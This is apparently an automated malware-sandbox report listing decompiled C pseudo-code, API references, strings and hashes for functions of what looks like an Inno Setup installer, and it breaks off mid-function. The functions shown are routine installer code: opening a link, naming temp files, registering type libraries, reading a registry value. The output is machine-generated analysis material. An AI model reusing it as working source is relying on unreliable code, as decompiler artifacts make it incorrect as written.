Function 0044FD0C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0044FD0C(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _v28;
				intOrPtr _t27;
				intOrPtr _t31;
				long _t32;
				char* _t46;
				void* _t53;
				intOrPtr _t60;
				void* _t73;

				_v16 = 0;
				_t53 = __eax;
				_push(_t73);
				_push(0x44fdfe);
				_push( *[fs:eax]);
				 *[fs:eax] = _t73 + 0xffffffe8;
				_t27 =  *((intOrPtr*)(__edx + 8));
				if( *((intOrPtr*)(_t27 + 8)) == 0x70b &&  *((intOrPtr*)(_t27 + 0xc)) == 0x201) {
					_v12 =  *((intOrPtr*)(_t27 + 0x18));
					_v8 =  *((intOrPtr*)(_t27 + 0x1c));
					_t31 = _v12;
					if(_t31 != 0 || _v8 != 0xffffffff) {
						_t32 = _v8 - _t31 + 1;
					} else {
						_t32 = SendMessageA(E004183F8(__eax), 0xe, 0, 0);
					}
					E004039EC( &_v16, _t32);
					_v28 = _v12;
					_v24 = _v8;
					_v20 = E00403880(_v16);
					E004039EC( &_v16, SendMessageA(E004183F8(_t53), 0x44b, 0,  &_v28));
					if(_v16 != 0) {
						_t46 = E00403880(_v16);
						ShellExecuteA(E004183F8(_t53), "open", _t46, 0, 0, 1);
					}
				}
				_pop(_t60);
				 *[fs:eax] = _t60;
				_push(0x44fe05);
				return E00403548( &_v16);
			}

0x0044fd17
0x0044fd1a
0x0044fd1e
0x0044fd1f
0x0044fd24
0x0044fd27
0x0044fd2a
0x0044fd36
0x0044fd4c
0x0044fd52
0x0044fd55
0x0044fd5a
0x0044fd7d
0x0044fd62
0x0044fd70
0x0044fd70
0x0044fd83
0x0044fd8b
0x0044fd91
0x0044fd9c
0x0044fdbc
0x0044fdc5
0x0044fdd0
0x0044fde3
0x0044fde3
0x0044fdc5
0x0044fdea
0x0044fded
0x0044fdf0
0x0044fdfd

APIs

SendMessageA.USER32 ref: 0044FD70
SendMessageA.USER32 ref: 0044FDB2
ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0044FDE3

Strings

open, xrefs: 0044FDD6

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: MessageSend$ExecuteShell
String ID: open
API String ID: 2179883421-2758837156
Opcode ID: 42564c6eeb6deef64650f52c8e23315e1c59a5b6dd070c11e69bba9944d2937d
Instruction ID: 3fa93964ceabb53ef9c22f00a65b48a4767f5f8ba133d652903184c3b2e2371a
Opcode Fuzzy Hash: 42564c6eeb6deef64650f52c8e23315e1c59a5b6dd070c11e69bba9944d2937d
Instruction Fuzzy Hash: 37216470F40704AFEB14EF69CC42B9EB7B8DB44714F20857BB411A7291D7789E44CA58

Uniqueness

Uniqueness Score: -1.00%

Function 0048A8E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E0048A8E4(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				signed int _t39;
				void* _t43;
				char _t52;
				intOrPtr _t62;
				void* _t66;
				signed int _t68;
				void* _t72;

				_v24 = 0;
				_v16 = 0;
				_v20 = 0;
				_v12 = __edx;
				_v8 = __eax;
				_push(_t72);
				_push(0x48a9da);
				_push( *[fs:eax]);
				 *[fs:eax] = _t72 + 0xffffffe4;
				E00403548(_v12);
				E0042CA40(_v8, 0,  &_v16);
				_t66 = 0;
				_t52 = 0;
				do {
					_v32 = _t52;
					_v28 = 0;
					E00407B08("isRS-%.3u.tmp", 0,  &_v32,  &_v24);
					E00403708( &_v20, _v24, _v16);
					_t39 = E00403880(_v20);
					_push(_t39);
					L00405A54();
					_t68 = _t39;
					if(_t68 == 0xffffffff) {
						L5:
						_push(1);
						_push(E00403880(_v20));
						_t43 = E00403880(_v8);
						_push(_t43);
						L00405B84();
						if(_t43 == 0) {
							_t66 = _t66 + 1;
							if(_t66 == 0xa) {
								break;
							}
							goto L8;
						}
						E004035DC(_v12, _v20);
						break;
					}
					if((_t68 & 0x00000010) != 0) {
						goto L8;
					}
					if((_t68 & 0x00000001) != 0) {
						_push(_t68 & 0xfffffffe);
						_push(E00403880(_v20));
						L00405BE4();
					}
					goto L5;
					L8:
					_t52 = _t52 + 1;
				} while (_t52 != 0x3e8);
				_pop(_t62);
				 *[fs:eax] = _t62;
				_push(E0048A9E1);
				return E00403568( &_v24, 3);
			}

0x0048a8ef
0x0048a8f2
0x0048a8f5
0x0048a8f8
0x0048a8fb
0x0048a900
0x0048a901
0x0048a906
0x0048a909
0x0048a90f
0x0048a91a
0x0048a91f
0x0048a921
0x0048a923
0x0048a927
0x0048a92a
0x0048a938
0x0048a946
0x0048a94e
0x0048a953
0x0048a954
0x0048a959
0x0048a95e
0x0048a982
0x0048a982
0x0048a98c
0x0048a990
0x0048a995
0x0048a996
0x0048a99d
0x0048a9ac
0x0048a9b0
0x00000000
0x00000000
0x00000000
0x0048a9b0
0x0048a9a5
0x00000000
0x0048a9a5
0x0048a966
0x00000000
0x00000000
0x0048a96e
0x0048a973
0x0048a97c
0x0048a97d
0x0048a97d
0x00000000
0x0048a9b2
0x0048a9b2
0x0048a9b3
0x0048a9c1
0x0048a9c4
0x0048a9c7
0x0048a9d9

APIs

6D7478A0.KERNEL32(00000000,0048B23D,00000000,0048A9DA,?,?,00000000,0048D628), ref: 0048A954
6D2B69D0.KERNEL32(00000000,00000000,00000000,0048B23D,00000000,0048A9DA,?,?,00000000,0048D628), ref: 0048A97D
6D2B6100.KERNEL32(00000000,00000000,00000001,00000000,0048B23D,00000000,0048A9DA,?,?,00000000,0048D628), ref: 0048A996

Strings

isRS-%.3u.tmp, xrefs: 0048A933

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: B6100D7478
String ID: isRS-%.3u.tmp
API String ID: 2591595736-3657609586
Opcode ID: 49e6b547a2fd8e0374bb205f38c61438e340f61d32b796195d9f596b7ba34205
Instruction ID: eb382a039b259471daef276d74e9ad645bfdf0e008dd4c0ff679db67ec782905
Opcode Fuzzy Hash: 49e6b547a2fd8e0374bb205f38c61438e340f61d32b796195d9f596b7ba34205
Instruction Fuzzy Hash: 4F21D7B0E04119AFDB04FFA9C881AAFB7B8EB44314F11497BF814B32D1D6786E018B59

Uniqueness

Uniqueness Score: -1.00%

Function 00454A9C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65
registryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00454A9C(void* __eax, void* __ebx, void* __edi, void* __esi) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr* _t23;
				intOrPtr _t39;
				void* _t45;
				void* _t46;
				intOrPtr _t47;

				_t43 = __esi;
				_t42 = __edi;
				_t45 = _t46;
				_t47 = _t46 + 0xfffffff4;
				_push(__esi);
				_push(__edi);
				_v16 = 0;
				_t32 = __eax;
				_push(_t45);
				_push(0x454b84);
				_push( *[fs:eax]);
				 *[fs:eax] = _t47;
				E0042C8F0(__eax,  &_v16);
				_v8 = E00403DEC(_v16);
				if(_v8 == 0) {
					E00408DE4();
				}
				_push(_t45);
				_push(0x454b67);
				_push( *[fs:edx]);
				 *[fs:edx] = _t47;
				_push( &_v12);
				_t19 = _v8;
				_push(_t19);
				L0042CD54();
				_t49 = _t19;
				if(_t19 != 0) {
					E00451C00("LoadTypeLib", _t32, _t19, _t42, _t43, _t49);
				}
				_push(_t45);
				_push(0x454b49);
				_push( *[fs:edx]);
				 *[fs:edx] = _t47;
				_push(0);
				_push(_v8);
				_t21 = _v12;
				_push(_t21);
				L0042CD5C();
				_t50 = _t21;
				if(_t21 != 0) {
					E00451C00("RegisterTypeLib", _t32, _t21, _t42, _t43, _t50);
				}
				_pop(_t39);
				 *[fs:eax] = _t39;
				_t23 = _v12;
				return  *((intOrPtr*)( *_t23 + 8))(_t23, E00454B50);
			}

0x00454a9c
0x00454a9c
0x00454a9d
0x00454a9f
0x00454aa3
0x00454aa4
0x00454aa7
0x00454aaa
0x00454aae
0x00454aaf
0x00454ab4
0x00454ab7
0x00454abf
0x00454acc
0x00454ad3
0x00454ad5
0x00454ad5
0x00454adc
0x00454add
0x00454ae2
0x00454ae5
0x00454aeb
0x00454aec
0x00454aef
0x00454af0
0x00454af5
0x00454af7
0x00454b00
0x00454b00
0x00454b07
0x00454b08
0x00454b0d
0x00454b10
0x00454b13
0x00454b18
0x00454b19
0x00454b1c
0x00454b1d
0x00454b22
0x00454b24
0x00454b2d
0x00454b2d
0x00454b34
0x00454b37
0x00454b3f
0x00454b48

APIs

Part of subcall function 0042C8F0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C914

Part of subcall function 00403DEC: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403E26
Part of subcall function 00403DEC: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403E31

LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00454AF0
RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00454B1D

Strings

LoadTypeLib, xrefs: 00454AFB
RegisterTypeLib, xrefs: 00454B28

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
String ID: LoadTypeLib$RegisterTypeLib
API String ID: 1312246647-2435364021
Opcode ID: 699b1495669719d1d07f44d49bb4d421f1a83f59606d3be109952a9e5c7833c1
Instruction ID: 84f6ed0dd6e95ffac2d918cf6216790266fd86d231671e529bdce5275550d417
Opcode Fuzzy Hash: 699b1495669719d1d07f44d49bb4d421f1a83f59606d3be109952a9e5c7833c1
Instruction Fuzzy Hash: 5311B130B00604AFDB01EFA6CD51F5EBBBDEB89349B108476F804D7652DA38EA44CA58

Uniqueness

Uniqueness Score: -1.00%

Function 00456530 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E00456530(char __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				char _v5;
				struct HICON__* _v12;
				char _v16;
				void* _t34;
				intOrPtr _t45;
				void* _t49;
				void* _t50;
				intOrPtr _t51;

				_t49 = _t50;
				_t51 = _t50 + 0xfffffff4;
				_v16 = 0;
				_t34 = __edx;
				_v5 = __eax;
				_push(_t49);
				_push(0x456674);
				_push( *[fs:eax]);
				 *[fs:eax] = _t51;
				 *0x48df2c = 0;
				 *0x48df30 = 0;
				E004075E4(0x48df34, 0xfff, __edx);
				E0042C990(_t34, 0xfff,  &_v16);
				E004075E4(0x48ef34, 0xfff, _v16);
				_v12 = SetCursor(LoadCursorA(0, 0x7f02));
				_push(_t49);
				_push(0x4565e8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t51;
				E00455FB0(0);
				E00456394(3, 0xfff, 0x2008);
				E00455FB0(0);
				_pop(_t45);
				 *[fs:eax] = _t45;
				_push(E004565EF);
				return SetCursor(_v12);
			}

0x00456531
0x00456533
0x0045653b
0x0045653e
0x00456540
0x00456545
0x00456546
0x0045654b
0x0045654e
0x00456556
0x0045655f
0x00456570
0x0045657a
0x0045658c
0x004565a3
0x004565a8
0x004565a9
0x004565ae
0x004565b1
0x004565b6
0x004565c5
0x004565cc
0x004565d3
0x004565d6
0x004565d9
0x004565e7

APIs

LoadCursorA.USER32 ref: 00456598
SetCursor.USER32(00000000,00000000,00007F02,00000000,00456674,?,?,00000000,0048D628), ref: 0045659E

Part of subcall function 00455FB0: CloseHandle.KERNEL32(00000000), ref: 00455FE0
Part of subcall function 00455FB0: WaitForSingleObject.KERNEL32(00000000,00002710,00000000), ref: 0045600A
Part of subcall function 00455FB0: GetExitCodeProcess.KERNEL32 ref: 0045601A
Part of subcall function 00455FB0: CloseHandle.KERNEL32(00000000,00000000,?,00000000,00002710,00000000,00000001,00000000,00002710,00000000), ref: 00456060
Part of subcall function 00455FB0: Sleep.KERNEL32(000000FA,00000000,00000000,?,00000000,00002710,00000000,00000001,00000000,00002710,00000000), ref: 00456079

Part of subcall function 00455FB0: TerminateProcess.KERNEL32(00000000,00000001,00000000,00002710,00000000), ref: 00455FFD

SetCursor.USER32(00000000,004565EF,00000000,00000000,00007F02,00000000,00456674,?,?,00000000,0048D628), ref: 004565E2

Strings

4H, xrefs: 00456582

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Cursor$CloseHandleProcess$CodeExitLoadObjectSingleSleepTerminateWait
String ID: 4H
API String ID: 268187739-4226881615
Opcode ID: e4556b50893848068e3f52c2dbfe31f33caad1037656d7fe57ca58f9ab8670ff
Instruction ID: 2fc0c4d5752764fadf2d93e733949e5f3b4dbb560107f4a19c3cfbd1c4fcb011
Opcode Fuzzy Hash: e4556b50893848068e3f52c2dbfe31f33caad1037656d7fe57ca58f9ab8670ff
Instruction Fuzzy Hash: 0711CA30B143446FDB01BFB68C52A5E7BA9DB49304F8289BFB904D7782D63C99049B58

Uniqueness

Uniqueness Score: -1.00%

Function 00466E18 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00466E18(FILETIME* __eax, void* __edx) {
				char _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				char _v40;
				signed int _v44;
				char _v48;
				signed int _v52;
				char _v56;
				signed int _v60;
				struct _SYSTEMTIME _v76;
				struct _FILETIME _v84;
				void* _t41;
				struct _FILETIME* _t46;

				_t41 = __edx;
				FileTimeToLocalFileTime(__eax, _t46);
				if(FileTimeToSystemTime( &_v84,  &_v76) == 0) {
					return E004035DC(_t41, "(invalid)");
				}
				_v60 = _v76.wYear & 0x0000ffff;
				_v56 = 0;
				_v52 = _v76.wMonth & 0x0000ffff;
				_v48 = 0;
				_v44 = _v76.wDay & 0x0000ffff;
				_v40 = 0;
				_v36 = _v76.wHour & 0x0000ffff;
				_v32 = 0;
				_v28 = _v76.wMinute & 0x0000ffff;
				_v24 = 0;
				_v20 = _v76.wSecond & 0x0000ffff;
				_v16 = 0;
				_v12 = _v76.wMilliseconds & 0x0000ffff;
				_v8 = 0;
				return E00407B08("%.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u", 6,  &_v60, _t41);
			}

0x00466e1c
0x00466e20
0x00466e36
0x00000000
0x00466eb7
0x00466e3e
0x00466e42
0x00466e4c
0x00466e50
0x00466e5a
0x00466e5e
0x00466e68
0x00466e6c
0x00466e76
0x00466e7a
0x00466e84
0x00466e88
0x00466e92
0x00466e96
0x00000000

APIs

FileTimeToLocalFileTime.KERNEL32(00000001), ref: 00466E20
FileTimeToSystemTime.KERNEL32(?,?,00000001), ref: 00466E2F

Strings

(invalid), xrefs: 00466EB2
%.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u, xrefs: 00466EA4

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Time$File$LocalSystem
String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
API String ID: 1748579591-1013271723
Opcode ID: 9b80f6908389a4ec1adb37550fd81e6d3ed6f3594ddd3f6ba781c1560d119da9
Instruction ID: a0a1dcbdd902da466c818bcaf7a9e53ea01babda05f126a3ba8e4cb0db95ffd4
Opcode Fuzzy Hash: 9b80f6908389a4ec1adb37550fd81e6d3ed6f3594ddd3f6ba781c1560d119da9
Instruction Fuzzy Hash: CB11F8A450C3919AD340CF6AC44032BBAE4AB89714F04492EF8D8D6381E77AC948DBB7

Uniqueness

Uniqueness Score: -1.00%

Function 00452546 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E00452546(void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t10;
				void* _t12;
				void* _t25;
				intOrPtr _t32;
				intOrPtr _t33;
				void* _t39;

				_t38 = __esi;
				_t37 = __edi;
				_t26 = __ecx;
				_push(0x20);
				_t25 = E00403880( *((intOrPtr*)(_t39 - 0x10)));
				_push(_t25);
				L00405BE4();
				_t10 = E00407064( *((intOrPtr*)(_t39 - 0x10)));
				_t40 = _t10;
				if(_t10 == 0) {
					E00451B58("DeleteFile", _t25, __ecx, __edi, __esi, _t40);
				}
				_push(_t25);
				_t12 = E00403880( *((intOrPtr*)(_t39 - 0x14)));
				_push(_t12);
				L00405B7C();
				_t41 = _t12;
				if(_t12 == 0) {
					E00451B58("MoveFile", _t25, _t26, _t37, _t38, _t41);
				}
				_pop(_t32);
				 *[fs:eax] = _t32;
				_pop(_t33);
				 *[fs:eax] = _t33;
				_push(E0045263D);
				E00403568(_t39 - 0x30, 2);
				E00403568(_t39 - 0x24, 2);
				return E00403568(_t39 - 0x14, 5);
			}

0x00452546
0x00452546
0x00452546
0x00452546
0x00452550
0x00452552
0x00452553
0x0045255b
0x00452560
0x00452562
0x00452569
0x00452569
0x0045256e
0x00452572
0x00452577
0x00452578
0x0045257d
0x0045257f
0x00452586
0x00452586
0x0045258d
0x00452590
0x00452603
0x00452606
0x00452609
0x00452616
0x00452623
0x00452635

APIs

6D2B69D0.KERNEL32(00000000,00000020), ref: 00452553

Part of subcall function 00407064: 6D2B5F60.KERNEL32(00000000,0048D628,0048AE72,00000000,0048AEC7,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 0040706F

6D2B6060.KERNEL32(00000000,00000000,00000000,00000020), ref: 00452578

Part of subcall function 00451B58: GetLastError.KERNEL32(00000000,00451BF0,?,?,00000000,00000000,00000005,00000000,00452636,?,?,00000000,0048D628,00000004,00000000,00000000), ref: 00451B7C

Strings

MoveFile, xrefs: 00452581
DeleteFile, xrefs: 00452564

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: B6060ErrorLast
String ID: DeleteFile$MoveFile
API String ID: 3664743183-139070271
Opcode ID: 931e543ea527a1970d1db37da824c1a576dc17bd9220667917c42d538250b66a
Instruction ID: 864a50f532196e3faefd5bce3943ef414dcc20f533096cf5cc29bef6dc39f3fe
Opcode Fuzzy Hash: 931e543ea527a1970d1db37da824c1a576dc17bd9220667917c42d538250b66a
Instruction Fuzzy Hash: BEF062716041446AE700FBB6D952A6E67E8EB45306F60447BFC00B7283EA7CAD098929

Uniqueness

Uniqueness Score: -1.00%

Function 00477FB4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00477FB4(void* __eflags) {
				void* _v8;
				int _v12;
				int _v16;
				char _v20;
				void* _t13;

				_t13 = E0042DD88(0, "System\\CurrentControlSet\\Control\\Windows", 0x80000002,  &_v8, 1, 0);
				if(_t13 == 0) {
					_v12 = 4;
					if(RegQueryValueExA(_v8, "CSDVersion", 0,  &_v16,  &_v20,  &_v12) == 0 && _v16 == 4 && _v12 == 4) {
						 *0x4ae264 = _v20;
					}
					return RegCloseKey(_v8);
				}
				return _t13;
			}

0x00477fce
0x00477fd5
0x00477fd7
0x00477ffc
0x0047800e
0x0047800e
0x00000000
0x00478018
0x00478020

APIs

Part of subcall function 0042DD88: 6D2B6790.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00477FD3,?,00000001,?,?,00477FD3,?,00000001,00000000), ref: 0042DDA4

RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00477FF5
RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00478018

Strings

System\CurrentControlSet\Control\Windows, xrefs: 00477FC2
CSDVersion, xrefs: 00477FEC

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: B6790CloseQueryValue
String ID: CSDVersion$System\CurrentControlSet\Control\Windows
API String ID: 2092121839-1910633163
Opcode ID: e9599dd1cbda872ee6d3e8dcac9cc3d6348620525bf40e9fdcbfbe4de07a8b80
Instruction ID: 8567f7656149d53deaf9202cd5905e416e84dda15cc376e9f094ee37e6a7a949
Opcode Fuzzy Hash: e9599dd1cbda872ee6d3e8dcac9cc3d6348620525bf40e9fdcbfbe4de07a8b80
Instruction Fuzzy Hash: D3F08675E40249A6DF10DAD08C49BDF73BCAB04314F10856AEA18E7290EA399A04CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0042D90C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E0042D90C(void* __eax) {
				char _v276;
				struct HINSTANCE__* _t5;
				void* _t8;
				void* _t12;

				_t8 = __eax;
				E00403548(__eax);
				_push("GetSystemWow64DirectoryA");
				_t5 = GetModuleHandleA("kernel32.dll");
				_push(_t5);
				L00405AA4();
				if(_t5 != 0) {
					_t5 = _t5->i( &_v276, 0x105);
					if(_t5 > 0 && _t5 < 0x105) {
						return E004036A4(_t8, 0x105, _t12);
					}
				}
				return _t5;
			}

0x0042d913
0x0042d917
0x0042d91c
0x0042d926
0x0042d92b
0x0042d92c
0x0042d933
0x0042d93f
0x0042d943
0x00000000
0x0042d955
0x0042d943
0x0042d961

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,0045224E,00000000,004522F1,?,?,00000000,00000000,00000000,00000000,00000000,?,004525BD,00000000), ref: 0042D926
6D2B5550.KERNEL32(00000000,kernel32.dll,GetSystemWow64DirectoryA,?,0045224E,00000000,004522F1,?,?,00000000,00000000,00000000,00000000,00000000,?,004525BD), ref: 0042D92C

Strings

kernel32.dll, xrefs: 0042D921
GetSystemWow64DirectoryA, xrefs: 0042D91C

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: B5550HandleModule
String ID: GetSystemWow64DirectoryA$kernel32.dll
API String ID: 2448194625-4063490227
Opcode ID: 953cd9359150011a28b5a6fefe3be20ce55d635a1f8f1b381f2918910b615c97
Instruction ID: b73a12c57fec50b88a149f9903b2a7b01e5abfdc9f4cfe2a16602de5fbde675e
Opcode Fuzzy Hash: 953cd9359150011a28b5a6fefe3be20ce55d635a1f8f1b381f2918910b615c97
Instruction Fuzzy Hash: 1EE020A0B44B1222D70061BA1C8375B114D4B84759F90053F755CE53C6DDFCD5C84A5D

Uniqueness

Uniqueness Score: -1.00%

Function 0048B084 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E0048B084() {
				struct HINSTANCE__* _t1;

				_push("DisableProcessWindowsGhosting");
				_t1 = GetModuleHandleA("user32.dll");
				_push(_t1);
				L00405AA4();
				if(_t1 != 0) {
					return _t1->i();
				}
				return _t1;
			}

0x0048b084
0x0048b08e
0x0048b093
0x0048b094
0x0048b09b
0x00000000
0x0048b09d
0x0048b09f

APIs

GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,0048B2FB,00000001,00000000,0048B31F), ref: 0048B08E
6D2B5550.KERNEL32(00000000,user32.dll,DisableProcessWindowsGhosting,0048B2FB,00000001,00000000,0048B31F), ref: 0048B094

Strings

user32.dll, xrefs: 0048B089
DisableProcessWindowsGhosting, xrefs: 0048B084

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: B5550HandleModule
String ID: DisableProcessWindowsGhosting$user32.dll
API String ID: 2448194625-834958232
Opcode ID: adad3af57262af8e9722c6bc9c726fb3704f590f70ba80362fdd7e7365ad03bb
Instruction ID: d117a5e3ccb81b925144f3eb5da2a2d2dbb0f339c2aa8ba8c1134fc3fde081d3
Opcode Fuzzy Hash: adad3af57262af8e9722c6bc9c726fb3704f590f70ba80362fdd7e7365ad03bb
Instruction Fuzzy Hash: 43B09240341B09188C6232F20C42B0F0048CC467087300E273430E51D2EFAC91004AAD

Uniqueness

Uniqueness Score: -1.00%

Function 00413F10 Relevance: 6.1, APIs: 4, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00413F10(intOrPtr* __eax, void* __ecx, signed int __edx) {
				intOrPtr* _t20;
				intOrPtr _t22;
				struct HICON__* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				intOrPtr _t28;
				struct HWND__* _t30;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t34;
